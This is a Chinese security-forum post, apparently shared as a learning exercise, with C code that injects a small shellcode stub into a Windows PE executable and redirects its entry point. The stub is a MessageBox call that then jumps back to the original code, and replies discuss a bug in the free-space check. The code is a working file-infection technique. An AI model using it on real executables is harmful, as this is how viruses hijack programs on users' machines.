[分享]感染程序+复习PE-编程技术-看雪-安全社区|安全招聘|kanxue.com

[分享]感染程序+复习PE

发表于: 2019-2-13 14:43 11517

[分享]感染程序+复习PE

Guxy

2019-2-13 14:43

11517

感谢滴水的培训视频，让我学到了很多知识。

程序的流程：文件状态(FileBuffer)->运行状态(ImageBuffer)->文件状态(NewFileBuffer)->存盘(新文件) 在运行状态中插入代码，然后修改程序入口点。

运行状态就是PE拉伸后的样子，有很多的地址需要注意，程序弄这么复杂就是为了复习PE知识。

#define SHELLCODESIZE 18
#define INFECTPATH "C:\\Users\\Guxy\\Desktop\\3.exe"

//文件状态
LPVOID GetFileContent(char* FilePath);
//文件状态转运行状态  --  PE拉伸
LPVOID FileBufferTOImageBuffer(LPVOID FileBuffer);
//获取运行状态的PE文件在磁盘中的大小
DWORD szFileSize(LPVOID ImageBuffer);
//运行状态转文件状态
LPVOID ImageBufferTOFileBuffer(LPVOID ImageBuffer, DWORD FileSize);
//修改运行状态的数据
void ModifyingData(LPVOID ImageBuffer, DWORD ProcAddr);

char shellcode[] = 
{ 
	0x6A, 00, 0x6A, 00, 0x6A, 00, 0x6A, 00, 
	0xE8, 00, 00, 00, 00, 
	0xE9, 00, 00, 00, 00 
};

//文件中状态
LPVOID GetFileContent(char* FilePath)
{
	FILE* pFile = fopen(FilePath, "rb");
	if (pFile == NULL)
	{
		printf("Fopen File Error:%d\n", GetLastError());
		return 0;
	}
	fseek(pFile, 0, SEEK_END);
	DWORD FileSize = ftell(pFile);
	fseek(pFile, 0, SEEK_SET);

	LPVOID Filebuffer = malloc(FileSize);
	if (!Filebuffer)
	{
		printf("Malloc Error:%d\n", GetLastError());
		fclose(pFile);
		return 0;
	}
	memset(Filebuffer, 0, FileSize);

	if (!fread(Filebuffer, FileSize, 1, pFile))
	{
		printf("Fread Error:%d\n", GetLastError());
		free(Filebuffer);
		fclose(pFile);
		return 0;
	}

	fclose(pFile);
	return Filebuffer;
}

//文件状态转运行状态
LPVOID FileBufferTOImageBuffer(LPVOID FileBuffer)
{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)FileBuffer;
	PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((char*)FileBuffer + pDosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER pec = (PIMAGE_SECTION_HEADER)((char*)FileBuffer + pDosHeader->e_lfanew + 24 + pNtHeader->FileHeader.SizeOfOptionalHeader);
        //PE文件在内存中的大小
	DWORD SizeOfImage = pNtHeader->OptionalHeader.SizeOfImage;
	LPVOID Imagebuff = malloc(SizeOfImage);
	if (!Imagebuff)
	{
		printf("FileBufferTOImageBuffer Malloc Error:%d\n", GetLastError());
		return 0;
	}

	memset(Imagebuff, 0, SizeOfImage);

	//复制所有头过去
	for (int i = 0; i < pNtHeader->OptionalHeader.SizeOfHeaders; i++)
	{
		*((char*)Imagebuff + i) = *((char*)FileBuffer + i);
	}

	//复制节，复制的位置是VirtualAddress 内存中的偏移，起始位置，从文件PointerToRawData 偏移处开始复制
	for (int m = 0; m < pNtHeader->FileHeader.NumberOfSections; m++, pec++)
	{
		for (int n = 0; n < pec->SizeOfRawData; n++)
		{
			*((char*)Imagebuff + pec->VirtualAddress + n) = *((char*)FileBuffer + pec->PointerToRawData + n);
		}
	}

	return Imagebuff;
}

//插入shellcode，修改程序入口地址  (注意有很多转换)
void ModifyingData(LPVOID ImageBuffer, DWORD ProcAddr)
{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)ImageBuffer;
	PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((char*)ImageBuffer + pDosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER pec = (PIMAGE_SECTION_HEADER)((char*)ImageBuffer + pDosHeader->e_lfanew + 24 + pNtHeader->FileHeader.SizeOfOptionalHeader);

        //判断是否有空闲空间
	for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++, pec++)
	{
		if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec->VirtualAddress) > SHELLCODESIZE)
		{
			printf("%s\n", pec->Name);

                        //定位shellcode插入到哪里。 内存偏移VirtualAddress  + VirtualSize节在内存中的大小
			char* codeBegin = (char*)ImageBuffer + pec->VirtualAddress + pec->Misc.VirtualSize;
                        //插入数据
			for (int s = 0; s < SHELLCODESIZE; s++)
			{
				*((char*)codeBegin + s) = shellcode[s];
			}

                        //修正E8后面的地址  要跳往的地址 - E8所在的地址(内存中) - 5
                        //E8在内存中的偏移 = ImageBuffer - (codeBegin + 8) + ImageBase （ImageBuffer是拉伸后的状态，所以偏移跟运行状态的偏移是一样的)
			DWORD callAddr = (DWORD)ProcAddr - ((codeBegin + 8) - ImageBuffer + (pNtHeader->OptionalHeader.ImageBase)) - 5;

			*(DWORD*)((char*)codeBegin + 9) = callAddr;
                        //修正E9后面的地址，同上。
			DWORD jmpAddr = (pNtHeader->OptionalHeader.AddressOfEntryPoint + pNtHeader->OptionalHeader.ImageBase) - ((DWORD)codeBegin + 13 - (DWORD)ImageBuffer + pNtHeader->OptionalHeader.ImageBase) - 5;

			*(DWORD*)((char*)codeBegin + 14) = jmpAddr;

                        //修改节属性
			pec->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE;


                        //修改入口点，也是偏移的计算。
			DWORD Oep = (DWORD)((char*)ImageBuffer + pec->VirtualAddress + pec->Misc.VirtualSize) - DWORD(ImageBuffer);

			pNtHeader->OptionalHeader.AddressOfEntryPoint = Oep;

			printf("Successful infection...\n");
			break;
		}
		else
		{
			printf("Insufficient space...\n");
			return;
		}
	}

	return;
}

//计算运行状态的PE文件在磁盘中的大小
//所有头的大小 + 所以节SizeOfRawData的大小
DWORD szFileSize(LPVOID ImageBuffer)
{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)ImageBuffer;
	PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((char*)ImageBuffer + pDosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER pec = (PIMAGE_SECTION_HEADER)((char*)ImageBuffer + pDosHeader->e_lfanew + 24 + pNtHeader->FileHeader.SizeOfOptionalHeader);

	DWORD SectionsSize = 0;
	for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
	{
		SectionsSize = SectionsSize + pec[i].SizeOfRawData;
	}
	DWORD FileSize = pNtHeader->OptionalHeader.SizeOfHeaders + SectionsSize;

	return FileSize;
}

//运行状态转文件状态->存盘
//又是转换，地址定位
LPVOID ImageBufferTOFileBuffer(LPVOID ImageBuffer, DWORD FileSize)
{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)ImageBuffer;
	PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((char*)ImageBuffer + pDosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER pec = (PIMAGE_SECTION_HEADER)((char*)ImageBuffer + pDosHeader->e_lfanew + 24 + pNtHeader->FileHeader.SizeOfOptionalHeader);

	LPVOID FileBuffer = malloc(FileSize);
	if (FileBuffer == NULL)
	{
		printf("ImageBufferTOFileBuffer Malloc Error:%d\n", GetLastError());
		return 0;
	}
	memset(FileBuffer, 0, FileSize);

	//Headers Copy
	for (int i = 0; i < pNtHeader->OptionalHeader.SizeOfHeaders; i++)
	{
		*((char*)FileBuffer + i) = *((char*)ImageBuffer + i);
	}

	//Sections Copy
	for (int n = 0; n < pNtHeader->FileHeader.NumberOfSections; n++, pec++)
	{
		for (int m = 0; m < pec->SizeOfRawData; m++)
		{
			*((char*)FileBuffer + pec->PointerToRawData + m) = *((char*)ImageBuffer + pec->VirtualAddress + m);
		}
	}


	FILE* pFile = fopen(INFECTPATH, "wb");

	fwrite(FileBuffer, FileSize, 1, pFile);

	fclose(pFile);

	return FileBuffer;
}

如果都没有空间的话，还可以自己新增一个节。里面少了shellcode要跳往的地址。

HMODULE Hmodule = LoadLibrary(L"User32.dll");

DWORD ProcAddr = (DWORD)GetProcAddress(Hmodule, "MessageBoxA");

因为我技术有限，现在还做不出通用的shellcode 谅解。

程序不方便理解，希望对正在学习PE的大哥有帮助。

非常感谢滴水培训视频！

[课程]FART 脱壳王！加量不加价！FART作者讲授！

上传的附件：

code.cpp （5.99kb，71次下载）
思路.png （5.57kb，33次下载）

收藏・24

免费・4

支持

打赏 + 1.00雪花

小冏子

打赏次数 1

雪花 + 1.00

小冏子

+1.00

2019/02/17

最新回复 (16)
bbsshop 雪币： 123 活跃值： (1675) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 86 粉丝 4 关注私信	bbsshop 2 楼 2019-2-13 15:37 0
ielts 雪币： 965 活跃值： (89) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 254 粉丝 1 关注私信	ielts 3 楼 2019-2-15 14:09 0
hbkccccc 雪币： 15925 活跃值： (3379) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 46 粉丝 0 关注私信	hbkccccc 4 楼 2019-2-17 11:40 0
小冏子雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	小冏子 5 楼 2019-2-17 13:41 0
小冏子雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	小冏子 6 楼楼主加油 2019-2-17 13:43 0
fellkill 雪币： 1014 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	fellkill 7 楼 ImageBufferToFileBuffer为啥还要这样 FILE* pFile = fopen(INFECTPATH, "wb"); fwrite(FileBuffer, FileSize, 1, pFile); fclose(pFile); 不是已经把头部和节表的信息写到FileBuffer中了吗。为什么还要重新打开文件再写出文件呢 2019-2-24 17:27 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 8 楼广州勇哥 ImageBufferToFileBuffer为啥还要这样 FILE* pFile = fopen(INFECTPATH, "wb"); fwrite(Fi ... 修改的只是缓存中的内容，保存修改了的内容，到一个新的文件。 2019-2-25 20:51 0
wx_顾尬聊雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	wx_顾尬聊 9 楼楼主，判断节区有没有多余的空间，应该是： if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec->Misc.VirtualSize) > SHELLCODESIZE) 2019-4-16 15:11 0
QZ2019 雪币： 299 能力值： ( LV1，RANK：0 ) 在线值：发帖 17 回帖 92 粉丝 5 关注私信	QZ2019 10 楼感谢海东老师 2019-6-13 20:59 0
badboyl 雪币： 4086 活跃值： (5766) 能力值： ( LV8，RANK：120 ) 在线值：发帖 7 回帖 191 粉丝 31 关注私信	badboyl 2 11 楼感谢分享，海东老师。 2019-6-18 22:35 0
Kiopler 雪币： 290 活跃值： (109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 1 关注私信	Kiopler 12 楼您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec->VirtualAddress) > SHELLCODESIZE) 根据我的知识，pec->SizeOfRawData是该节在磁盘中的大小(以FileAlignment对齐)而VirtualAddress是该节(以SectionAlignment对齐)位于内存中的RVA。这两个相减为什么得出该节是否有剩余的位置呢? 楼主能不能和我解释下最后于 2019-6-23 18:58 被Kiopler编辑，原因： 2019-6-23 18:57 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 13 楼 Kiopler 您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 4个月前写的代码了，忘了当时的思路了，也有4个月没有碰PE了。 2019-6-23 21:53 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 14 楼 Kiopler 您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 代码应该写错了，是减去在内存中的大小，Misc.VirtualSize 2019-6-23 22:08 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 15 楼 wx_顾尬聊楼主，判断节区有没有多余的空间，应该是：if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 谢谢你。 2019-6-23 22:10 0
Kiopler 雪币： 290 活跃值： (109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 1 关注私信	Kiopler 16 楼好的，学习你的代码。学到很多，谢谢楼主分享 2019-6-24 08:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Guxy

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
bbsshop 雪币： 123 活跃值： (1675) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 86 粉丝 4 关注私信	bbsshop 2 楼 2019-2-13 15:37 0
ielts 雪币： 965 活跃值： (89) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 254 粉丝 1 关注私信	ielts 3 楼 2019-2-15 14:09 0
hbkccccc 雪币： 15925 活跃值： (3379) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 46 粉丝 0 关注私信	hbkccccc 4 楼 2019-2-17 11:40 0
小冏子雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	小冏子 5 楼 2019-2-17 13:41 0
小冏子雪币： 39 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	小冏子 6 楼楼主加油 2019-2-17 13:43 0
fellkill 雪币： 1014 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	fellkill 7 楼 ImageBufferToFileBuffer为啥还要这样 FILE* pFile = fopen(INFECTPATH, "wb"); fwrite(FileBuffer, FileSize, 1, pFile); fclose(pFile); 不是已经把头部和节表的信息写到FileBuffer中了吗。为什么还要重新打开文件再写出文件呢 2019-2-24 17:27 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 8 楼广州勇哥 ImageBufferToFileBuffer为啥还要这样 FILE* pFile = fopen(INFECTPATH, "wb"); fwrite(Fi ... 修改的只是缓存中的内容，保存修改了的内容，到一个新的文件。 2019-2-25 20:51 0
wx_顾尬聊雪币：能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	wx_顾尬聊 9 楼楼主，判断节区有没有多余的空间，应该是： if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec->Misc.VirtualSize) > SHELLCODESIZE) 2019-4-16 15:11 0
QZ2019 雪币： 299 能力值： ( LV1，RANK：0 ) 在线值：发帖 17 回帖 92 粉丝 5 关注私信	QZ2019 10 楼感谢海东老师 2019-6-13 20:59 0
badboyl 雪币： 4086 活跃值： (5766) 能力值： ( LV8，RANK：120 ) 在线值：发帖 7 回帖 191 粉丝 31 关注私信	badboyl 2 11 楼感谢分享，海东老师。 2019-6-18 22:35 0
Kiopler 雪币： 290 活跃值： (109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 1 关注私信	Kiopler 12 楼您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec->VirtualAddress) > SHELLCODESIZE) 根据我的知识，pec->SizeOfRawData是该节在磁盘中的大小(以FileAlignment对齐)而VirtualAddress是该节(以SectionAlignment对齐)位于内存中的RVA。这两个相减为什么得出该节是否有剩余的位置呢? 楼主能不能和我解释下最后于 2019-6-23 18:58 被Kiopler编辑，原因： 2019-6-23 18:57 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 13 楼 Kiopler 您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 4个月前写的代码了，忘了当时的思路了，也有4个月没有碰PE了。 2019-6-23 21:53 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 14 楼 Kiopler 您好，这段代码我有点没看明白 if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 代码应该写错了，是减去在内存中的大小，Misc.VirtualSize 2019-6-23 22:08 0
Guxy 雪币： 197 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 26 粉丝 1 关注私信	Guxy 15 楼 wx_顾尬聊楼主，判断节区有没有多余的空间，应该是：if ((DWORD)(pec->SizeOfRawData) - (DWORD)(pec- ... 谢谢你。 2019-6-23 22:10 0
Kiopler 雪币： 290 活跃值： (109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 1 关注私信	Kiopler 16 楼好的，学习你的代码。学到很多，谢谢楼主分享 2019-6-24 08:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复